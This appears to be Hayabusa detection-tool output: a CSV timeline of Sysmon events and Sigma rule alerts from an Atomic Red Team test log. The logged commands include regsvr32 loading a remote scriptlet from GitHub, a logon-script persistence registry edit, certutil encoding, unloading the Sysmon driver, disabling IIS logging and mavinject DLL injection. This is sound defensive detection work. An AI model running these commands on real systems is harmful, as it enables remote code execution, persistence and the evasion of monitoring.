C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,low,Suspicious Network Command,,rules/sigma/process_creation/win_pc_susp_network_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.301 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: arp -a : Path: C:\Windows\System32\ARP.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""arp -a""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 
+2019-07-19 23:53:42.404 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.815 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:43.445 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:43.574 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:44.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Regsvr32 
Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:45.157 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.204 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.848 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\SysWOW64\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:47.083 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\SysWOW64\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\regsvr32.exe"" /s 
C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:47.239 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:54.976 +09:00,-,-,low,Quick Execution of a Series of Suspicious Commands,[condition] count() by MachineName > 5 in timeframe [result] count:8 MachineName:null timeframe:5m,rules/sigma/process_creation/win_multiple_suspicious_cli.yml,- +2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" 
cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,high,Logon Scripts (UserInitMprLogonScript) Registry,,rules/sigma/registry_event/sysmon_logon_scripts_userinitmprlogonscript_reg.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,medium,Commun Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_commun.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:01.955 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:16.782 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""rar a -r exfilthis.rar *.docx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:16.830 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:57.044 +09:00,MSEDGEWIN10,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:58.819 +09:00,MSEDGEWIN10,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:02.378 +09:00,MSEDGEWIN10,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:02.806 +09:00,MSEDGEWIN10,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:02.895 +09:00,MSEDGEWIN10,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:02.977 +09:00,MSEDGEWIN10,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.235 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: certutil.exe -encode c:\file.exe file.txt : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 
23:57:03.974 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: certutil.exe -decode file.txt c:\file.exe : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.210 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent 
Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,informational,Process 
Creation,Command: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt : Path: C:\Users\IEUser\AppData\Local\Temptcm.tmp : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.643 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:14.715 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""fltmc.exe unload SysmonDrv"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:14.758 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:14.944 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\System32\inetsrv\appcmd.exe set config "" ""Default /section:httplogging /dontLog:true"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:14.991 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\mavinject.exe"" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll : Path: C:\Windows\System32\mavinject.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,critical,MavInject Process Injection,,rules/sigma/process_creation/win_mavinject_proc_inj.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:16.496 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c .\bin\T1055.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:16.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:44.283 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.073 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c 